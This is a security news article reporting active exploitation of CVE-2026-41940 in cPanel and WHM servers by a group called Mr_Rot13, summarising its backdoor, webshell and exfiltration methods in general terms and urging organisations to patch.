A significant security flaw identified as CVE-2026-41940 is currently being exploited in cPanel and WHM servers globally, posing a severe threat to cybersecurity. This vulnerability, with a critical severity score of 9.8, enables cybercriminals to gain effortless access to systems without requiring traditional credentials.
Exploitation and Impact
Unauthenticated attackers are leveraging this vulnerability to compromise security and gain administrative control. This exploit has paved the way for various malicious activities such as ransomware deployment, cryptomining, and establishing persistent backdoors in Linux servers. Since its public disclosure in April 2026, there has been a significant increase in automated attacks targeting this flaw.
DailyDarkWeb reports indicate that over 2,000 unique IP addresses globally, predominantly from the US, Germany, Brazil, and the Netherlands, are actively exploiting this vulnerability. Security experts from Ctrl-Alt-Intel have revealed instances where hackers have breached Southeast Asian governmental networks, extracting over 4.37 GB of sensitive data.
The Role of Mr_Rot13
An advanced hacking group, referred to as Mr_Rot13 by XLab, has been linked to this sophisticated campaign. Known for deploying undetectable PHP backdoors, this group uses the Rot13 algorithm to obfuscate their command-and-control mechanisms in JavaScript payloads. Mr_Rot13’s operations are highly organized, with a history of adapting quickly to security challenges by updating their malware and communication methods.
The attack methodology involves exploiting the CVE-2026-41940 vulnerability to bypass authentication, granting attackers instant administrative privileges. A Go-based injector tool, named ‘Payload,’ is used to modify server credentials and secure backdoor access.
Technical Details and Defense
Once access is gained, the attackers alter the server root password and introduce malicious SSH public keys. A PHP webshell, dubbed ‘Cpanel-Python,’ is deployed, injecting malicious scripts into login pages to capture sensitive data. This data is then sent to a remote command-and-control server.
The attackers further employ ‘Filemanager,’ a versatile remote control Trojan compatible with multiple operating systems, to manage and execute commands on compromised servers. Stolen configuration files and database credentials are exfiltrated through secure channels to the group’s web domains and a Telegram bot.
Indicators of compromise include specific domains and MD5 hashes associated with the malicious activities. It’s crucial for organizations to monitor and mitigate these threats using controlled intelligence platforms.
The exploitation of CVE-2026-41940 underscores the importance of robust cybersecurity measures. Organizations must remain vigilant, apply timely patches, and utilize comprehensive threat detection systems to safeguard their infrastructure against such vulnerabilities.
